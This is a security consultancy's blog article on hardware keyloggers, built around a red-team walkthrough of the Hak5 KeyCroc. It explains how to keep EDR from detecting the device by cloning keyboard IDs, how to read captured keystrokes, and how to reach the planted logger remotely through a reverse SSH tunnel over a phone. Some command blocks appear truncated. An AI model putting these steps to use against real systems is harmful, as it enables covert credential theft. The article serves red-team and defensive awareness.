Hardware-Keylogger - Behind the Keyboard


Behind the Keyboard

Marius Elmiger
by Marius Elmiger
on July 06, 2023
time to read: 18 minutes


This is how Hardware Keyloggers work

  • An exploration of the purpose and functionality of hardware keyloggers
  • How hardware keyloggers are configured and installed
  • Illustrating the process of capturing keystrokes
  • Detection and prevention against hardware keyloggers

In the realm of IT security, the threat landscape constantly evolves, with adversaries employing increasingly sophisticated methods to gain unauthorised access to sensitive information. Among the covert tools adversaries utilise, hardware keyloggers can be used as stealthy devices designed to capture keystrokes covertly. With their inconspicuous nature and ability to intercept and record every keyboard stroke, these devices pose risks to organisations. In this article, we delve into the world of hardware keyloggers, exploring their functionality, potential applications, and the measures necessary to protect against this form of attack.

The attack scenario later described in this article is mainly based on an insider threat in which an adversary may conduct attacks by planting a hardware keylogger to capture confidential data or passwords.

What is a Hardware Keylogger?

Hardware keyloggers are physical devices that are connected between the keyboard and the computer. They record information directly from the keyboard before it reaches the computer’s operating system. By doing so, the attacker gains the ability to silently capture passwords, login credentials, and other confidential information. They may store the recorded data internally in their own memory or have the capability to transmit it wirelessly to a remote location for retrieval. Hardware keyloggers can be challenging to detect as they are physically hidden between the keyboard and the computer. This sets them apart to Software keyloggers which may be detected through antivirus, anti-malware scans or EDR solutions.

To construct a hardware keylogger from the ground up, there are various manuals available, such as the one by spacehuhn, keelog or RedBulletTooling. Alternatively, ready-made keyloggers can be purchased from reputable manufacturers. Hak5 and O.MG are among the well-known and trusted manufacturers in this field. Unfortunately, commercial Keyloggers are mostly closed source. Therefore even when the manufacturer is generaly trusted the device it is crucial to do a detailed analysis by reviewing its functionality.

KeyCroc Hardware Keylogger

Who will use them?

Various actors can install hardware keyloggers, each with their own motives and methods. Here are some possible scenarios:

It’s important to note that the sophistication of hardware keyloggers varies. Some may be discreetly integrated into the device or peripheral, making them difficult to detect visually. Additionally, keyloggers can transmit captured data remotely if they have Wifi or mobile data connection capabilities implemented

Example Attack

The previously mentioned scenarios are ideal to simulate during a Red Team engagement. Subsequently, in the following sections, we explain how the Hak5 KeyCroc can effectively function as a keylogger, capturing keystrokes and facilitating remote access. However, it is important to note that the KeyCroc offers additional functionalities beyond keystroke logging. These include keystroke injection, trusted device emulation, pattern matching payloads, network hijacking, Wi-Fi connectivity, and more. Additionally, Hak5 has provided multiple keystroke injection samples on their GitHub repository.

KeyCroc, Original Source: https://shop.hak5.org/products/key-croc

KeyCroc Configuration

Some configuration steps are required before the KeyCroc can be used. The following chapters complement the HAK5 KeyCroc documentation. Additionally, you should thoroughly review the behaviour of the keylogger, for example, for unwanted communication.

PID/VID ID Cloning

The KeyCroc with the Version 1.3_513 is not cloning the keyboard VID (Vendor ID) and PID (Product ID). Without fixing this behaviour, the KeyCroc is detected by modern EDRs.

Default KeyCroc is getting detected by EDRs, Picture from Microsoft Defender for Endpoint

To correct this behavior, we suggest following these steps:

Fix the default VID and PID

With the following steps you can change the default KeyCroc VID and PID.

cd /usr/local/croc/bin

We also recommend changing the default VID and PID for the storage and the network adapter.

Fix the cloning functionality

The following steps are fixing the cloning functionality of the keyCroc.

cd /usr/local/croc/bin
cp croc_framework croc_framework.bak
nano croc_framework

General Setup

This step only needs to be done once before the Key Croc device can be used.

We verified the Key Croc with the following keyboards:

KeyCroc in Action

KeyCroc in Action

How to read out the Loot log

Loot example from a KeyCroc

The following PowerShell script can support you in finding passwords or other information faster: keycroc_char_analysis.ps1

Remote connection via Internet to the KeyCroc

The following proof-of-concept describe how you can connect via SSH remotely to the KeyCroc.

POC prerequisites

Prepare the KeyCroc

ssh-keygen -t ed25519 -m PKCS8 -C "$(whoami)@$(hostname)-$(date -I)" -f ~/.ssh/id_ed25519_home

Remote SSH Server

sudo useradd -m keycroc
sudo mkdir /home/keycroc/.ssh
sudo touch /home/keycroc/.ssh/authorized_keys
sudo chown -R keycroc:keycroc /home/keycroc/.ssh/
sudo chmod 700 /home/keycroc/.ssh
sudo chmod 600 /home/keycroc/.ssh/authorized_keys
sudo nano /etc/passwd

Prepare a Mobile Data Connection Device The following example is using an Android phone with a mobile data connection plan. We recommend to use a keyboard to configure the phone. The phone should be encrypted and using a strong password to unlock the phone.

pkg upgrade
pkg update
pkg install openssh
pkg install screen

ssh -N -R 42022:localhost:8022 -p 50022 -i /data/data/com.termux/files/home/storage/downloads/keycroc-openssh-privkey.ppk keycroc@$SHHServerIP

Establish the connection to the KeyCroc

ssh u0_a255@localhost -p 42022
ssh root@

Remote connection to the KeyCroc


To reduce the risk of hardware keyloggers, the following measures can be taken:


In conclusion, hardware keyloggers can pose a threat to the security of organizations, as they can covertly intercept and record keystrokes and compromising sensitive information. This article has provided an overview of hardware keyloggers, their attack scenarios, and a technical example illustrating how they operate. To counter the dangers associated with hardware keyloggers and safeguard assets from internal threats, it is crucial for organizations to adopt a comprehensive approach. Technological safeguards play a vital role in mitigating risks. However, technological measures alone are not sufficient. Organizations must also prioritize employee education and awareness. It is essential to foster a positive security culture within the organization, emphasizing the importance of security measures and encouraging employees to actively participate in protecting sensitive information. Furthermore, organizations should appreciate their employees and create an environment where they feel valued and motivated. This helps foster loyalty and reduces the likelihood of insider threats. By promoting a positive work environment, organizations can minimize the risk of employees turning to malicious activities. Finally, an effective incident response framework is critical in addressing keylogger incidents promptly and efficiently. Establishing clear protocols and response plans, conducting exercises, and maintaining strong communication channels within the organization enables swift detection, containment, and resolution of keylogger-related incidents. By combining these measures, organizations can enhance their defenses against keyloggers, mitigate risks from adversaries, and better protect their IT-environment and sensitive information.

About the Author

Marius Elmiger

Marius Elmiger is a security professional since the early 2000’s. He worked in various IT roles such as an administrator, engineer, architect, and consultant. His main activities included the implementation of complex IT infrastructure projects, implementation of security hardening concepts, and compromise recoveries. Later he transitioned to the offensive side. As a foundation, in addition to numerous IT certificates, Marius graduated with an MSc in Advanced Security & Digital Forensics at Edinburgh Napier University. (ORCID 0000-0002-2580-5636)


You want to bring your logging and monitoring to the next level?

Our experts will get in contact with you!

Credential Tiering

Credential Tiering

Marius Elmiger

Credential Tiering

Credential Tiering

Marius Elmiger

Outsmarting the Watchdog

Outsmarting the Watchdog

Marius Elmiger

Hidden Dangers of Phishing Attacks

Hidden Dangers of Phishing Attacks

Marius Elmiger

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here